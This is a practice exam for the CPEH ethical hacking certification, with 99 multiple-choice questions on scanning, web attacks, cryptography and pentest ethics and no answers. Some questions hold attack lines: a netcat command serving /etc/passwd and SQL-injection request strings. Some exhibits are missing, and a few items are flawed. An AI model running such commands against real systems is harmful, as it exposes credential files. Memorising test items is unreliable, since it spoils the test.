GAQM CPEH-001 Certified Professional Ethical Hacker (CPEH) Exam Practice Test

Demo: 110 questions
Total 736 questions

Certified Professional Ethical Hacker (CPEH) Questions and Answers

Question 1

An attacker with access to the inside network of a small company launches a successful STP manipulation attack. What will he do next?

Options:

A.

He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer.

B.

He will activate OSPF on the spoofed root bridge.

C.

He will repeat the same attack against all L2 switches of the network.

D.

He will repeat this action so that it escalates to a DoS attack.

Question 2

Websites and web portals that provide web services commonly use the Simple Object Access Protocol (SOAP). Which of the following is an incorrect definition or characteristic of the protocol?

Options:

A.

Based on XML

B.

Provides a structured model for messaging

C.

Exchanges data between web services

D.

Only compatible with the application protocol HTTP

Question 3

An attacker gains access to a Web server's database and displays the contents of the table that holds all of the names, passwords, and other user information. The attacker did this by entering information into the Web site's user login page that the software's designers did not expect to be entered. This is an example of what kind of software design problem?

Options:

A.

Insufficient input validation

B.

Insufficient exception handling

C.

Insufficient database hardening

D.

Insufficient security management

Question 4

Which of the following programming languages is most susceptible to buffer overflow attacks, due to its lack of a built-in bounds checking mechanism?

Output:

Segmentation fault

Options:

A.

C#

B.

Python

C.

Java

D.

C++

Question 5

In both pharming and phishing attacks an attacker can create websites that look similar to legitimate sites with the intent of collecting personally identifiable information from the victims. What is the difference between pharming and phishing attacks?

Options:

A.

In a pharming attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack an attacker provides the victim with a URL that is either misspelled or looks similar to the actual website's domain name.

B.

Both pharming and phishing attacks are purely technical and are not considered forms of social engineering.

C.

Both pharming and phishing attacks are identical.

D.

In a phishing attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual website's domain name.

Question 6

You work as a Security Analyst for a retail organization. In securing the company's network, you set up a firewall and an IDS. However, hackers are able to attack the network. After investigating, you discover that your IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the IDS giving?

Options:

A.

False Negative

B.

False Positive

C.

True Negative

D.

True Positive

Question 7

A hacker has managed to gain access to a Linux host and has stolen the password file /etc/passwd. How can he use it?

Options:

A.

The password file does not contain the passwords themselves.

B.

He can open it and read the user ids and corresponding passwords.

C.

The file reveals the passwords to the root user only.

D.

He cannot read it because it is encrypted.

Question 8

What is the role of test automation in security testing?

Options:

A.

It can accelerate benchmark tests and repeat them with a consistent test setup. But it cannot replace manual testing completely.

B.

It is an option but it tends to be very expensive.

C.

It should be used exclusively. Manual testing is outdated because of low speed and possible test setup inconsistencies.

D.

Test automation is not usable in security due to the complexity of the tests.

Question 9

An Internet Service Provider (ISP) has a need to authenticate users connecting using analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network.

Which AAA protocol is most likely able to handle this requirement?

Options:

A.

RADIUS

B.

DIAMETER

C.

Kerberos

D.

TACACS+

Question 10

A well-intentioned researcher discovers a vulnerability on the web site of a major corporation. What should he do?

Options:

A.

Ignore it.

B.

Try to sell the information to a well-paying party on the dark web.

C.

Notify the web site owner so that corrective action can be taken as soon as possible to patch the vulnerability.

D.

Exploit the vulnerability without harming the web site owner so that attention is drawn to the problem.

Question 11

In cryptanalysis and computer security, 'pass the hash' is a hacking technique that allows an attacker to authenticate to a remote server/service by using the underlying NTLM and/or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case.

Metasploit Framework has a module for this technique: psexec. The psexec module is often used by penetration testers to obtain access to a given system for which you already know the credentials. It was written by Sysinternals and has been integrated within the framework. Often, penetration testers successfully gain access to a system through some exploit, use Meterpreter (or other methods like fgdump, pwdump, or cachedump) to grab the password hashes, and then utilize rainbow tables to crack those hash values.

Which of the following is the correct hash type and order used in the psexec module's 'smbpass' option?

Options:

A.

NT:LM

B.

LM:NT

C.

LM:NTLM

D.

NTLM:LM

Question 12

An attacker is using nmap to do a ping sweep and a port scan in a subnet of 254 addresses.

In which order should he perform these steps?

Options:

A.

The sequence does not matter. Both steps have to be performed against all hosts.

B.

First the port scan to identify interesting services and then the ping sweep to find hosts responding to icmp echo requests.

C.

First the ping sweep to identify live hosts and then the port scan on the live hosts. This way he saves time.

D.

The port scan alone is adequate. This way he saves time.

Question 13

What network security concept requires multiple layers of security controls to be placed throughout an IT infrastructure, which improves the security posture of an organization to defend against malicious attacks or potential vulnerabilities?

Options:

A.

Security through obscurity

B.

Host-Based Intrusion Detection System

C.

Defense in depth

D.

Network-Based Intrusion Detection System

Question 14

Bob learned that his username and password for a popular game have been compromised. He contacts the company and resets all the information. The company suggests he use two-factor authentication. Which option below offers that?

Options:

A.

A new username and password

B.

A fingerprint scanner and his username and password.

C.

Disable his username and use just a fingerprint scanner.

D.

His username and a stronger password.

Question 15

What mechanism in Windows prevents a user from accidentally executing a potentially malicious batch (.bat) or PowerShell (.ps1) script?

Options:

A.

User Access Control (UAC)

B.

Data Execution Prevention (DEP)

C.

Address Space Layout Randomization (ASLR)

D.

Windows firewall

Question 16

Which of the following is considered an exploit framework and has the ability to perform automated attacks on services, ports, applications and unpatched security flaws in a computer system?

Options:

A.

Wireshark

B.

Maltego

C.

Metasploit

D.

Nessus

Question 17

What is the minimum number of network connections in a multi-homed firewall?

Options:

A.

3

B.

5

C.

4

D.

2

Question 18

Which of the following DoS tools is used to attack target web applications by starvation of available sessions on the web server?

The tool keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value.

Options:

A.

My Doom

B.

Astacheldraht

C.

R-U-Dead-Yet?(RUDY)

D.

LOIC

Question 19

A Security Policy is a definition of what it means to be secure for a system, organization or other entity. For Information Technologies, there are sub-policies like Computer Security Policy, Information Protection Policy, Information Security Policy, Network Security Policy, Physical Security Policy, Remote Access Policy, and User Account Policy.

What is the main theme of the sub-policies for Information Technologies?

Options:

A.

Availability, Non-repudiation, Confidentiality

B.

Authenticity, Integrity, Non-repudiation

C.

Confidentiality, Integrity, Availability

D.

Authenticity, Confidentiality, Integrity

Question 20

Assume a business-crucial web-site of some company that is used to sell handsets to the customers worldwide. All the developed components are reviewed by the security team on a monthly basis. In order to drive business further, the web-site developers decided to add some 3rd party marketing tools on it. The tools are written in JavaScript and can track the customer’s activity on the site. These tools are located on the servers of the marketing company.

What is the main security risk associated with this scenario?

Options:

A.

External script contents could be maliciously modified without the security team's knowledge

B.

External scripts have direct access to the company servers and can steal the data from there

C.

There is no risk at all as the marketing services are trustworthy

D.

External scripts increase the outbound company data traffic, which leads to greater financial losses

Question 21

Log monitoring tools performing behavioral analysis have alerted on several suspicious logins on a Linux server occurring during non-business hours. After further examination of all login activities, it is noticed that none of the logins have occurred during typical work hours. A Linux administrator who is investigating this problem realizes the system time on the Linux server is wrong by more than twelve hours. What protocol used on Linux servers to synchronize the time has stopped working?

Options:

A.

Time Keeper

B.

NTP

C.

PPP

D.

OSPP

Question 22

You perform a scan of your company’s network and discover that TCP port 123 is open. What services by default run on TCP port 123?

Options:

A.

Telnet

B.

POP3

C.

Network Time Protocol

D.

DNS

Question 23

Which of the following is considered as one of the most reliable forms of TCP scanning?

Options:

A.

TCP Connect/Full Open Scan

B.

Half-open Scan

C.

NULL Scan

D.

Xmas Scan

Question 24

When performing a risk assessment, you need to determine the potential impacts when some of the company's critical business processes have their service interrupted. What is the name of the process by which you can determine those critical business processes?

Options:

A.

Risk Mitigation

B.

Emergency Plan Response (EPR)

C.

Disaster Recovery Planning (DRP)

D.

Business Impact Analysis (BIA)

Question 25

Insecure direct object reference is a type of vulnerability where the application does not verify if the user is authorized to access the internal object via its name or key.

Suppose a malicious user Rob tries to get access to the account of a benign user Ned.

Which of the following requests best illustrates an attempt to exploit an insecure direct object reference vulnerability?

Options:

A.

"GET /restricted/goldtransfer?to=Rob&from=1 or 1=1' HTTP/1.1 Host: westbank.com"

B.

"GET /restricted/accounts/?name=Ned HTTP/1.1 Host: westbank.com"

C.

"GET /restricted/bank.getaccount('Ned') HTTP/1.1 Host: westbank.com"

D.

"GET /restricted/\r\n\%00account%00Ned%00access HTTP/1.1 Host: westbank.com"

Question 26

Which of the following attacks exploits web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend?

Options:

A.

Command Injection Attacks

B.

File Injection Attack

C.

Cross-Site Request Forgery (CSRF)

D.

Hidden Field Manipulation Attack

Question 27

In Wireshark, the packet bytes pane shows the data of the current packet in which format?

Options:

A.

Decimal

B.

ASCII only

C.

Binary

D.

Hexadecimal

Question 28

Alice encrypts her data using her public key PK and stores the encrypted data in the cloud. Which of the following attack scenarios will compromise the privacy of her data?

Options:

A.

None of these scenarios compromise the privacy of Alice’s data

B.

Agent Andrew subpoenas Alice, forcing her to reveal her private key. However, the cloud server successfully resists Andrew’s attempt to access the stored data

C.

Hacker Harry breaks into the cloud server and steals the encrypted data

D.

Alice also stores her private key in the cloud, and Harry breaks into the cloud server as before

Question 29

Why are containers less secure than virtual machines?

Options:

A.

The host OS running containers has a larger attack surface.

B.

Containers may fill up the disk space of the host.

C.

A compromised container may cause CPU starvation on the host.

D.

Containers are attached to the same virtual network.

Question 30

Some clients of TPNQM SA were redirected to a malicious site when they tried to access the TPNQM main site. Bob, a system administrator at TPNQM SA, found that they were victims of DNS Cache Poisoning.

What should Bob recommend to deal with such a threat?

Options:

A.

The use of security agents in clients’ computers

B.

The use of DNSSEC

C.

The use of double-factor authentication

D.

Client awareness

Question 31

You need a tool that can do network intrusion prevention and intrusion detection, function as a network sniffer, and record network activity. What tool would you most likely select?

Options:

A.

Nmap

B.

Cain & Abel

C.

Nessus

D.

Snort

Question 32

Trinity needs to scan all hosts on a /16 network for TCP port 445 only. What is the fastest way she can accomplish this with Nmap? Stealth is not a concern.

Options:

A.

nmap -sn -sF 10.1.0.0/16 445

B.

nmap -p 445 -n -T4 --open 10.1.0.0/16

C.

nmap -s 445 -sU -T5 10.1.0.0/16

D.

nmap -p 445 --max -Pn 10.1.0.0/16

Question 33

Which of the following are well known password-cracking programs?

Options:

A.

L0phtcrack

B.

NetCat

C.

Jack the Ripper

D.

Netbus

E.

John the Ripper

Question 34

You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles.

You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems.

In other words, you are trying to penetrate an otherwise impenetrable system.

How would you proceed?

Options:

A.

Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network

B.

Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information

C.

Launch DDoS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"

D.

Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

Question 35

Which definition among those given below best describes a covert channel?

Options:

A.

A server program using a port that is not well known.

B.

Making use of a protocol in a way it is not intended to be used.

C.

It is the multiplexing taking place on a communication link.

D.

It is one of the weak channels used by WEP which makes it insecure

Question 36

As a security consultant, what are some of the things you would recommend to a company to ensure DNS security?

Options:

A.

Use the same machines for DNS and other applications

B.

Harden DNS servers

C.

Use split-horizon operation for DNS servers

D.

Restrict Zone transfers

E.

Have subnet diversity between DNS servers

Question 37

An LDAP directory can be used to store information similar to a SQL database. LDAP uses a _____ database structure instead of SQL's _____ structure. Because of this, LDAP has difficulty representing many-to-one relationships.

Options:

A.

Relational, Hierarchical

B.

Strict, Abstract

C.

Hierarchical, Relational

D.

Simple, Complex

Question 38

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

Options:

A.

logs the incoming connections to /etc/passwd file

B.

loads the /etc/passwd file to the UDP port 55555

C.

grabs the /etc/passwd file when connected to UDP port 55555

D.

deletes the /etc/passwd file when connected to the UDP port 55555

Question 39

Study the snort rule given below and interpret the rule.

alert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg:"mountd access";)

Options:

A.

An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111

B.

An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet

C.

An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet

D.

An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

Question 40

What is the purpose of a DNS AAAA record?

Options:

A.

Authorization, Authentication and Auditing record

B.

Address prefix record

C.

Address database record

D.

IPv6 address resolution record

Question 41

You have the SOA presented below in your Zone.

Your secondary servers have not been able to contact your primary server to synchronize information. How long will the secondary servers attempt to contact the primary server before they consider the zone dead and stop responding to queries?

collegae.edu.SOA, cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600)

Options:

A.

One day

B.

One hour

C.

One week

D.

One month

Question 42

One of your team members has asked you to analyze the following SOA record.

What is the TTL? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400)

Options:

A.

200303028

B.

3600

C.

604800

D.

2400

E.

60

F.

4800

Question 43

Which of the following tools are used for enumeration? (Choose three.)

Options:

A.

SolarWinds

B.

USER2SID

C.

Cheops

D.

SID2USER

E.

DumpSec

Question 44

Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal?

Options:

A.

har.txt

B.

SAM file

C.

wwwroot

D.

Repair file

Question 45

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes unsanitized user-provided data.

What is this attack?

Options:

A.

Cross-site-scripting attack

B.

SQL Injection

C.

URL Traversal attack

D.

Buffer Overflow attack

Question 46

How does a denial-of-service attack work?

Options:

A.

A hacker prevents a legitimate user (or group of users) from accessing a service

B.

A hacker uses every character, word, or letter he or she can think of to defeat authentication

C.

A hacker tries to decipher a password by using a system, which subsequently crashes the network

D.

A hacker attempts to imitate a legitimate user by confusing a computer or even another person

Question 47

Fred is the network administrator for his company. Fred is testing an internal switch.

From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this?

Options:

A.

Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer.

B.

He can send an IP packet with the SYN bit and the source address of his computer.

C.

Fred can send an IP packet with the ACK bit set to zero and the source address of the switch.

D.

Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

Question 48

Study the following log extract and identify the attack.

Options:

A.

Hexcode Attack

B.

Cross Site Scripting

C.

Multiple Domain Traversal Attack

D.

Unicode Directory Traversal Attack

Question 49

Which of the following tools would MOST LIKELY be used to perform a security audit on various forms of network systems?

Options:

A.

Intrusion Detection System

B.

Vulnerability scanner

C.

Port scanner

D.

Protocol analyzer

Question 50

Matthew received an email with an attachment named "YouWon$10Grand.zip." The zip file contains a file named "HowToClaimYourPrize.docx.exe." Out of excitement and curiosity, Matthew opened the said file. Without his knowledge, the file copies itself to Matthew's APPDATA\local directory and begins to beacon to a command-and-control server to download additional malicious binaries. What type of malware has Matthew encountered?

Options:

A.

Key-logger

B.

Trojan

C.

Worm

D.

Macro Virus

Question 51

Which of the following commands runs snort in packet logger mode?

Options:

A.

./snort -dev -h ./log

B.

./snort -dev -l ./log

C.

./snort -dev -o ./log

D.

./snort -dev -p ./log

Question 52

Which of the following is the BEST approach to prevent Cross-site Scripting (XSS) flaws?

Options:

A.

Use digital certificates to authenticate a server prior to sending data.

B.

Verify access right before allowing access to protected information and UI controls.

C.

Verify access right before allowing access to protected information and UI controls.

D.

Validate and escape all information sent to a server.

Question 53

A distributed port scan operates by:

Options:

A.

Blocking access to the scanning clients by the targeted host

B.

Using denial-of-service software against a range of TCP ports

C.

Blocking access to the targeted host by each of the distributed scanning clients

D.

Having multiple computers each scan a small number of ports, then correlating the results

Question 54

Which access control mechanism allows for multiple systems to use a central authentication server (CAS) that permits users to authenticate once and gain access to multiple systems?

Options:

A.

Role Based Access Control (RBAC)

B.

Discretionary Access Control (DAC)

C.

Windows authentication

D.

Single sign-on

Question 55

While doing a technical assessment to determine network vulnerabilities, you used the TCP XMAS scan. What would be the response of all open ports?

Options:

A.

The port will send an ACK

B.

The port will send a SYN

C.

The port will ignore the packets

D.

The port will send an RST

Question 56

Which of the following Nmap commands would be used to perform stack fingerprinting?

Options:

A.

Nmap -O -p80

B.

Nmap -hU -Q

C.

Nmap -sT -p

D.

Nmap -u -o -w2

E.

Nmap -sS -0p targe

Question 57

Which of the following is a vulnerability in GNU's bash shell (discovered in September of 2014) that gives attackers the ability to run remote commands on a vulnerable system?

Options:

A.

Shellshock

B.

Rootshell

C.

Rootshock

D.

Shellbash

Question 58

What would you type on the Windows command line in order to launch the Computer Management Console provided that you are logged in as an admin?

Options:

A.

c:\compmgmt.msc

B.

c:\gpedit

C.

c:\ncpa.cpl

D.

c:\services.msc

Question 59

If you are to determine the attack surface of an organization, which of the following is the BEST thing to do?

Options:

A.

Running a network scan to detect network services in the corporate DMZ

B.

Reviewing the need for a security clearance for each employee

C.

Using configuration management to determine when and where to apply security patches

D.

Training employees on the security policy regarding social engineering

Question 60

While reviewing the results of a scan run against a target network, you come across the following:

Which among the following can be used to get this output?

Options:

A.

A Bo2k system query.

B.

nmap protocol scan

C.

A sniffer

D.

An SNMP walk

Question 61

Which of the following security policies defines the use of VPN for gaining access to an internal corporate network?

Options:

A.

Network security policy

B.

Remote access policy

C.

Information protection policy

D.

Access control policy

Question 62

A new wireless client that is 802.11 compliant cannot connect to a wireless network even though the client can see the network and has compatible hardware and software installed. Upon further tests and investigation, it was found that the Wireless Access Point (WAP) was not responding to the association requests being sent by the wireless client. What MOST likely is the issue in this scenario?

Options:

A.

The client cannot see the SSID of the wireless network

B.

The WAP does not recognize the client’s MAC address.

C.

The wireless client is not configured to use DHCP.

D.

Client is configured for the wrong channel

Question 63

A hacker was able to easily gain access to a website. He was able to log in via the frontend user login form of the website using default or commonly used credentials. This exploitation is an example of what software design flaw?

Options:

A.

Insufficient security management

B.

Insufficient database hardening

C.

Insufficient input validation

D.

Insufficient exception handling

Question 64

An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts.

Options:

A.

2

B.

256

C.

512

D.

Over 10,000

Question 65

What is the benefit of performing an unannounced Penetration Testing?

Options:

A.

The tester will have an actual security posture visibility of the target network.

B.

Network security would be in a "best state" posture.

C.

It is best to catch critical infrastructure unpatched.

D.

The tester could not provide an honest analysis.

Question 66

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist's email, and you send her an email changing the source email to her boss's email (boss@company). In this email, you ask for a PDF with information. She reads your email and sends back a PDF with links. You exchange the PDF links with your malicious links (these links contain malware) and send back the modified PDF, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network.

What testing method did you use?

Options:

A.

Social engineering

B.

Tailgating

C.

Piggybacking

D.

Eavesdropping

Question 67

The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization focused on improving the security of software. What item is the primary concern on OWASP's Top Ten Project Most Critical Web Application Security Risks?

Options:

A.

Injection

B.

Cross Site Scripting

C.

Cross Site Request Forgery

D.

Path disclosure

Question 68

When you are testing a web application, it is very useful to employ a proxy tool to save every request and response. You can manually test every request and analyze the response to find vulnerabilities. You can test parameters and headers manually to get more precise results than when using web vulnerability scanners.

What proxy tool will help you find web vulnerabilities?

Options:

A.

Burpsuite

B.

Maskgen

C.

Dimitry

D.

Proxychains

Question 69

Initiating an attack against targeted businesses and organizations, threat actors compromise a carefully selected website by inserting an exploit resulting in malware infection. The attackers run exploits on well-known and trusted sites likely to be visited by their targeted victims. Aside from carefully choosing sites to compromise, these attacks are known to incorporate zero-day exploits that target unpatched vulnerabilities. Thus, the targeted entities are left with little or no defense against these exploits.

What type of attack is outlined in the scenario?

Options:

A.

Watering Hole Attack

B.

Heartbleed Attack

C.

Shellshock Attack

D.

Spear Phishing Attack

Question 70

Which of the following is a design pattern based on distinct pieces of software providing application functionality as services to other applications?

Options:

A.

Service Oriented Architecture

B.

Object Oriented Architecture

C.

Lean Coding

D.

Agile Process

Question 71

You are performing information gathering for an important penetration test. You have found PDF, DOC, and image files belonging to your target. You decide to extract metadata from these files and analyze it.

What tool will help you with the task?

Options:

A.

Metagoofil

B.

Armitage

C.

Dimitry

D.

cdpsnarf

Question 72

When you are getting information about a web server, it is very important to know the HTTP methods (GET, POST, HEAD, PUT, DELETE, TRACE) that are available, because two of them are critical (PUT and DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all these methods (GET, POST, HEAD, PUT, DELETE, TRACE) using the Nmap Scripting Engine.

What nmap script will help you with this task?

Options:

A.

http-methods

B.

http-enum

C.

http-headers

D.

http-git

Question 73

> NMAP -sn 192.168.11.200-215

The NMAP command above performs which of the following?

Options:

A.

A ping scan

B.

A trace sweep

C.

An operating system detect

D.

A port scan

Question 74

It is a regulation that has a set of guidelines, which should be adhered to by anyone who handles any electronic medical data. These guidelines stipulate that all medical practices must ensure that all necessary measures are in place while saving, accessing, and sharing any electronic medical data to keep patient data secure.

Which of the following regulations best matches the description?

Options:

A.

HIPAA

B.

ISO/IEC 27002

C.

COBIT

D.

FISMA

Question 75

Which of the following is the successor of SSL?

Options:

A.

TLS

B.

RSA

C.

GRE

D.

IPSec

Question 76

This phase will increase the odds of success in later phases of the penetration test. It is also the very first step in Information Gathering, and it will tell you what the "landscape" looks like.

What is the most important phase of ethical hacking in which you need to spend a considerable amount of time?

Options:

A.

footprinting

B.

network mapping

C.

gaining access

D.

escalating privileges

Question 77

Jesse receives an email with an attachment labeled "Court_Notice_21206.zip". Inside the zip file is a file named "Court_Notice_21206.docx.exe" disguised as a Word document. Upon execution, a window appears stating, "This word document is corrupt." In the background, the file copies itself to Jesse's APPDATA\local directory and begins to beacon to a C2 server to download additional malicious binaries.

What type of malware has Jesse encountered?

Options:

A.

Trojan

B.

Worm

C.

Macro Virus

D.

Key-Logger

Question 78

What is a "Collision attack" in cryptography?

Options:

A.

Collision attacks try to find two inputs producing the same hash.

B.

Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key.

C.

Collision attacks try to get the public key.

D.

Collision attacks try to break the hash into three parts to get the plaintext value.
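Option A describes the attack; the cheapest generic way to carry it out is a birthday search, which needs only about the square root of the digest space in trials. The following is an added example, not part of the exam material: it truncates SHA-1 to an assumed 32-bit toy digest (TRUNC_BYTES is a parameter chosen here) so that a collision appears after roughly 2^16 hashes, and confirms that the two colliding messages still have different full SHA-1 digests. The same search against the untruncated 160-bit output would take on the order of 2^80 trials, which is why collision resistance is stated in terms of digest length.

```python
import hashlib
import math
from typing import Dict, Tuple

# Assumed toy parameter: keep only the first 4 bytes (32 bits) of SHA-1 so a
# collision is cheap to find. Full SHA-1 (160 bits) is not attacked here.
TRUNC_BYTES = 4


def short_hash(data: bytes, n: int = TRUNC_BYTES) -> bytes:
    """Toy hash: the first n bytes of SHA-1(data), i.e. an 8*n-bit digest."""
    return hashlib.sha1(data).digest()[:n]


def full_digest(data: bytes) -> bytes:
    """The real 160-bit SHA-1 digest, used to show the toy collision does not carry over."""
    return hashlib.sha1(data).digest()


def expected_trials(bits: int) -> float:
    """Birthday bound: the mean number of random inputs hashed before two share
    a digest of the given size is about sqrt(pi/2 * 2**bits)."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_collision(n: int = TRUNC_BYTES, prefix: bytes = b"msg-") -> Tuple[bytes, bytes, int]:
    """Birthday attack: hash distinct messages, remembering each digest seen,
    until one repeats. Returns (first_message, second_message, trials).
    Messages are prefix + counter, so every message is distinct by construction."""
    seen: Dict[bytes, bytes] = {}
    counter = 0
    while True:
        msg = prefix + str(counter).encode()
        counter += 1
        h = short_hash(msg, n)
        if h in seen:
            return seen[h], msg, counter
        seen[h] = msg


if __name__ == "__main__":
    m1, m2, trials = find_collision()
    print(f"collision after {trials} trials "
          f"(birthday estimate {expected_trials(8 * TRUNC_BYTES):.0f})")
    print(m1, m2, short_hash(m1).hex(), short_hash(m2).hex())
    # The full digests still differ: the attack only beat the truncated output.
    print(full_digest(m1) != full_digest(m2))
```

The dictionary of seen digests is what makes the search quadratic-free: memory grows with the number of trials, which is the usual time/memory trade a collision search makes. Note that the attacker chooses both inputs; a preimage attack, where one input is fixed, gets no birthday advantage and costs about 2^bits trials.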

Question 79

It is an entity or event with the potential to adversely impact a system through unauthorized access, destruction, disclosure, denial of service or modification of data.

Which of the following terms best matches the definition?

Options:

A.

Threat

B.

Attack

C.

Vulnerability

D.

Risk

Question 80

You've just been hired to perform a pen test on an organization that has been subjected to a large-scale attack. The CIO is concerned with mitigating threats and vulnerabilities to totally eliminate risk.

What is one of the first things you should do when given the job?

Options:

A.

Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels.

B.

Interview all employees in the company to rule out possible insider threats.

C.

Establish attribution to suspected attackers.

D.

Start the Wireshark application to begin sniffing network traffic.

Question 81

Which of the following items is unique to the N-tier architecture method of designing software applications?

Options:

A.

Application layers can be separated, allowing each layer to be upgraded independently from other layers.

B.

It is compatible with various databases including Access, Oracle, and SQL.

C.

Data security is tied into each layer and must be updated for all layers when any upgrade is performed.

D.

Application layers can be written in C, ASP.NET, or Delphi without any performance loss.

Question 82

Which of the following algorithms provides better protection against brute force attacks by using a 160-bit message digest?

Options:

A.

MD5

B.

SHA-1

C.

RC4

D.

MD4

Question 83

Advanced encryption standard is an algorithm used for which of the following?

Options:

A.

Data integrity

B.

Key discovery

C.

Bulk data encryption

D.

Key recovery

Question 84

A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost two months ago, but has yet to get paid. The customer is suffering from financial problems, and the CEH is worried that the company will go out of business and end up not paying. What actions should the CEH take?

Options:

A.

Threaten to publish the penetration test results if not paid.

B.

Follow proper legal procedures against the company to request payment.

C.

Tell other customers of the financial problems with payments from this company.

D.

Exploit some of the vulnerabilities found on the company webserver to deface it.

Question 85

The intrusion detection system at a software development company suddenly generates multiple alerts regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What should the security team do to determine which alerts to check first?

Options:

A.

Investigate based on the maintenance schedule of the affected systems.

B.

Investigate based on the service level agreements of the systems.

C.

Investigate based on the potential effect of the incident.

D.

Investigate based on the order that the alerts arrived in.

Question 86

Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the network’s IDS?

Options:

A.

Timing options to slow the speed that the port scan is conducted

B.

Fingerprinting to identify which operating systems are running on the network

C.

ICMP ping sweep to determine which hosts on the network are not available

D.

Traceroute to control the path of the packets sent during the scan

Question 87

Which of the following is an example of IP spoofing?

Options:

A.

SQL injections

B.

Man-in-the-middle

C.

Cross-site scripting

D.

ARP poisoning

Question 88

Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and that a certificate is still valid for specific operations?

Options:

A.

Certificate issuance

B.

Certificate validation

C.

Certificate cryptography

D.

Certificate revocation

Question 89

The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services?

Options:

A.

An extensible security framework named COBIT

B.

A list of flaws and how to fix them

C.

Web application patches

D.

A security certification for hardened web applications

Question 90

When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open Source Security Testing Methodology Manual (OSSTMM) the main difference is

Options:

A.

OWASP is for web applications and OSSTMM does not include web applications.

B.

OSSTMM is gray box testing and OWASP is black box testing.

C.

OWASP addresses controls and OSSTMM does not.

D.

OSSTMM addresses controls and OWASP does not.

Question 91

A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway, they are both on the 192.168.1.0/24 network. Which of the following has occurred?

Options:

A.

The gateway is not routing to a public IP address.

B.

The computer is using an invalid IP address.

C.

The gateway and the computer are not on the same network.

D.

The computer is not using a private IP address.

Question 92

Which of the following can take an arbitrary length of input and produce a message digest output of 160 bits?

Options:

A.

SHA-1

B.

MD5

C.

HAVAL

D.

MD4

Question 93

A consultant has been hired by the V.P. of a large financial organization to assess the company's security posture. During the security testing, the consultant comes across child pornography on the V.P.'s computer. What is the consultant's obligation to the financial organization?

Options:

A.

Say nothing and continue with the security testing.

B.

Stop work immediately and contact the authorities.

C.

Delete the pornography, say nothing, and continue security testing.

D.

Bring the discovery to the financial organization's human resource department.

Question 94

Which of the following guidelines or standards is associated with the credit card industry?

Options:

A.

Control Objectives for Information and Related Technology (COBIT)

B.

Sarbanes-Oxley Act (SOX)

C.

Health Insurance Portability and Accountability Act (HIPAA)

D.

Payment Card Industry Data Security Standards (PCI DSS)

Question 95

Which of the following descriptions is true about a static NAT?

Options:

A.

A static NAT uses a many-to-many mapping.

B.

A static NAT uses a one-to-many mapping.

C.

A static NAT uses a many-to-one mapping.

D.

A static NAT uses a one-to-one mapping.

Question 96

Which of the following is an advantage of utilizing security testing methodologies to conduct a security audit?

Options:

A.

They provide a repeatable framework.

B.

Anyone can run the command line scripts.

C.

They are available at low cost.

D.

They are subject to government regulation.

Question 97

One way to defeat a multi-level security solution is to leak data via

Options:

A.

a bypass regulator.

B.

steganography.

C.

a covert channel.

D.

asymmetric routing.

Question 98

Which tool can be used to silently copy files from USB devices?

Options:

A.

USB Grabber

B.

USB Dumper

C.

USB Sniffer

D.

USB Snoopy

Question 99

How can rainbow tables be defeated?

Options:

A.

Password salting

B.

Use of non-dictionary words

C.

All uppercase character passwords

D.

Lockout accounts under brute force password cracking attempts
